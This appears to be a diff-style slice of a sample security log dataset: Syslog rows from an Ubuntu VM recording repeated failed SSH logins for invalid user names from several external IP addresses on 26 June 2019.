+16846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:38:33,UbuntuDevEnv,2019-06-26 07:38:32,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 41088:11: Bye Bye [preauth],45949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,41088,,
+16847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:38:33,UbuntuDevEnv,2019-06-26 07:38:32,auth,UbuntuDevEnv,info,Disconnected from authenticating user irc 46.101.149.230 port 41088 [preauth],45949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,irc,46.101.149.2,41088,,
+16848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:38:34,UbuntuDevEnv,2019-06-26 07:38:34,auth,UbuntuDevEnv,info,Failed password for invalid user vyatta from 87.101.240.10 port 39684 ssh2,45957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,87.101.240.1,39684,,
+16849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:38:34,UbuntuDevEnv,2019-06-26 07:38:34,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 39684:11: Bye Bye [preauth],45957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,39684,,
+16850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:38:34,UbuntuDevEnv,2019-06-26 07:38:34,auth,UbuntuDevEnv,info,Disconnected from invalid user vyatta 87.101.240.10 port 39684 [preauth],45957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,87.101.240.1,39684,,
+16851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:39:31,UbuntuDevEnv,2019-06-26 07:39:31,auth,UbuntuDevEnv,info,Invalid user pen from 206.189.118.156 port 59990,46168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pen,206.189.118.1,59990,,
+16852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:39:31,UbuntuDevEnv,2019-06-26 07:39:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,46168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:39:31,UbuntuDevEnv,2019-06-26 07:39:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:39:33,UbuntuDevEnv,2019-06-26 07:39:33,auth,UbuntuDevEnv,info,Failed password for invalid user pen from 206.189.118.156 port 59990 ssh2,46168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pen,206.189.118.1,59990,,
+16855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:39:33,UbuntuDevEnv,2019-06-26 07:39:33,auth,UbuntuDevEnv,info,Disconnected from invalid user pen 206.189.118.156 port 59990 [preauth],46168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pen,206.189.118.1,59990,,
+16856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:39:33,UbuntuDevEnv,2019-06-26 07:39:33,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 59990:11: Bye Bye [preauth],46168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,59990,,
+16857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:13,UbuntuDevEnv,2019-06-26 07:40:12,auth,UbuntuDevEnv,info,Invalid user reine from 45.55.190.46 port 41466,46265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reine,45.55.190.4,41466,,
+16858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:13,UbuntuDevEnv,2019-06-26 07:40:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,46265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+16859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:13,UbuntuDevEnv,2019-06-26 07:40:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:15,UbuntuDevEnv,2019-06-26 07:40:14,auth,UbuntuDevEnv,info,Failed password for invalid user reine from 45.55.190.46 port 41466 ssh2,46265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reine,45.55.190.4,41466,,
+16861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:18,UbuntuDevEnv,2019-06-26 07:40:18,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 41466:11: Bye Bye [preauth],46265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,41466,,
+16862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:18,UbuntuDevEnv,2019-06-26 07:40:18,auth,UbuntuDevEnv,info,Disconnected from invalid user reine 45.55.190.46 port 41466 [preauth],46265,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reine,45.55.190.4,41466,,
+16863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:37,UbuntuDevEnv,2019-06-26 07:40:37,auth,UbuntuDevEnv,info,Invalid user naissance from 87.101.240.10 port 56938,46406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,naissance,87.101.240.1,56938,,
+16864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:37,UbuntuDevEnv,2019-06-26 07:40:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,46406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:37,UbuntuDevEnv,2019-06-26 07:40:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:39,UbuntuDevEnv,2019-06-26 07:40:39,auth,UbuntuDevEnv,info,Failed password for invalid user naissance from 87.101.240.10 port 56938 ssh2,46406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,naissance,87.101.240.1,56938,,
+16867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:39,UbuntuDevEnv,2019-06-26 07:40:39,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 56938:11: Bye Bye [preauth],46406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,56938,,
+16868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:39,UbuntuDevEnv,2019-06-26 07:40:39,auth,UbuntuDevEnv,info,Disconnected from invalid user naissance 87.101.240.10 port 56938 [preauth],46406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,naissance,87.101.240.1,56938,,
+16869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:42,UbuntuDevEnv,2019-06-26 07:40:42,auth,UbuntuDevEnv,info,Invalid user public_html from 46.101.149.230 port 58210,46418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,46.101.149.2,58210,,
+16870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:42,UbuntuDevEnv,2019-06-26 07:40:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:42,UbuntuDevEnv,2019-06-26 07:40:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,46418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:45,UbuntuDevEnv,2019-06-26 07:40:44,auth,UbuntuDevEnv,info,Failed password for invalid user public_html from 46.101.149.230 port 58210 ssh2,46418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,46.101.149.2,58210,,
+16873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:45,UbuntuDevEnv,2019-06-26 07:40:44,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 58210:11: Bye Bye [preauth],46418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,58210,,
+16874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:40:45,UbuntuDevEnv,2019-06-26 07:40:44,auth,UbuntuDevEnv,info,Disconnected from invalid user public_html 46.101.149.230 port 58210 [preauth],46418,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,46.101.149.2,58210,,
+16875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:41:03,UbuntuDevEnv,2019-06-26 07:41:03,auth,UbuntuDevEnv,info,Invalid user info from 206.189.118.156 port 49212,46507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,206.189.118.1,49212,,
+16876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:41:03,UbuntuDevEnv,2019-06-26 07:41:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:41:03,UbuntuDevEnv,2019-06-26 07:41:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,46507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:41:05,UbuntuDevEnv,2019-06-26 07:41:05,auth,UbuntuDevEnv,info,Failed password for invalid user info from 206.189.118.156 port 49212 ssh2,46507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,206.189.118.1,49212,,
+16879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:41:05,UbuntuDevEnv,2019-06-26 07:41:05,auth,UbuntuDevEnv,info,Disconnected from invalid user info 206.189.118.156 port 49212 [preauth],46507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,206.189.118.1,49212,,
+16880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:41:05,UbuntuDevEnv,2019-06-26 07:41:05,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 49212:11: Bye Bye [preauth],46507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,49212,,
+16881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:33,UbuntuDevEnv,2019-06-26 07:42:32,auth,UbuntuDevEnv,info,Invalid user zhuai from 206.189.118.156 port 38428,46821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhuai,206.189.118.1,38428,,
+16882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:33,UbuntuDevEnv,2019-06-26 07:42:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:33,UbuntuDevEnv,2019-06-26 07:42:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,46821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:34,UbuntuDevEnv,2019-06-26 07:42:33,auth,UbuntuDevEnv,info,Connection closed by 83.211.37.208 port 41099 [preauth],46797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,83.211.37.2,41099,,
+16885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:35,UbuntuDevEnv,2019-06-26 07:42:34,auth,UbuntuDevEnv,info,Failed password for invalid user zhuai from 206.189.118.156 port 38428 ssh2,46821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhuai,206.189.118.1,38428,,
+16886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:35,UbuntuDevEnv,2019-06-26 07:42:34,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 38428:11: Bye Bye [preauth],46821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,38428,,
+16887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:35,UbuntuDevEnv,2019-06-26 07:42:34,auth,UbuntuDevEnv,info,Disconnected from invalid user zhuai 206.189.118.156 port 38428 [preauth],46821,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhuai,206.189.118.1,38428,,
+16888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:40,UbuntuDevEnv,2019-06-26 07:42:39,auth,UbuntuDevEnv,info,Invalid user lei from 87.101.240.10 port 45954,46844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lei,87.101.240.1,45954,,
+16889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:40,UbuntuDevEnv,2019-06-26 07:42:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,46844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:40,UbuntuDevEnv,2019-06-26 07:42:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:41,UbuntuDevEnv,2019-06-26 07:42:41,auth,UbuntuDevEnv,info,Failed password for invalid user lei from 87.101.240.10 port 45954 ssh2,46844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lei,87.101.240.1,45954,,
+16892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:41,UbuntuDevEnv,2019-06-26 07:42:41,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 45954:11: Bye Bye [preauth],46844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,45954,,
+16893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:41,UbuntuDevEnv,2019-06-26 07:42:41,auth,UbuntuDevEnv,info,Disconnected from invalid user lei 87.101.240.10 port 45954 [preauth],46844,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lei,87.101.240.1,45954,,
+16894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:48,UbuntuDevEnv,2019-06-26 07:42:47,auth,UbuntuDevEnv,info,Invalid user ts3bot from 46.101.149.230 port 47108,46868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3bot,46.101.149.2,47108,,
+16895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:48,UbuntuDevEnv,2019-06-26 07:42:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,46868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:48,UbuntuDevEnv,2019-06-26 07:42:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,46868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:50,UbuntuDevEnv,2019-06-26 07:42:49,auth,UbuntuDevEnv,info,Failed password for invalid user ts3bot from 46.101.149.230 port 47108 ssh2,46868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3bot,46.101.149.2,47108,,
+16898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:50,UbuntuDevEnv,2019-06-26 07:42:49,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3bot 46.101.149.230 port 47108 [preauth],46868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3bot,46.101.149.2,47108,,
+16899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:42:50,UbuntuDevEnv,2019-06-26 07:42:49,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 47108:11: Bye Bye [preauth],46868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,47108,,
+16900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:03,UbuntuDevEnv,2019-06-26 07:44:02,auth,UbuntuDevEnv,info,Invalid user tester from 206.189.118.156 port 55878,47140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tester,206.189.118.1,55878,,
+16901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:03,UbuntuDevEnv,2019-06-26 07:44:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,47140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:03,UbuntuDevEnv,2019-06-26 07:44:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:05,UbuntuDevEnv,2019-06-26 07:44:04,auth,UbuntuDevEnv,info,Failed password for invalid user tester from 206.189.118.156 port 55878 ssh2,47140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tester,206.189.118.1,55878,,
+16904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:05,UbuntuDevEnv,2019-06-26 07:44:04,auth,UbuntuDevEnv,info,Disconnected from invalid user tester 206.189.118.156 port 55878 [preauth],47140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tester,206.189.118.1,55878,,
+16905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:44:05,UbuntuDevEnv,2019-06-26 07:44:04,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 55878:11: Bye Bye [preauth],47140,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,55878,,
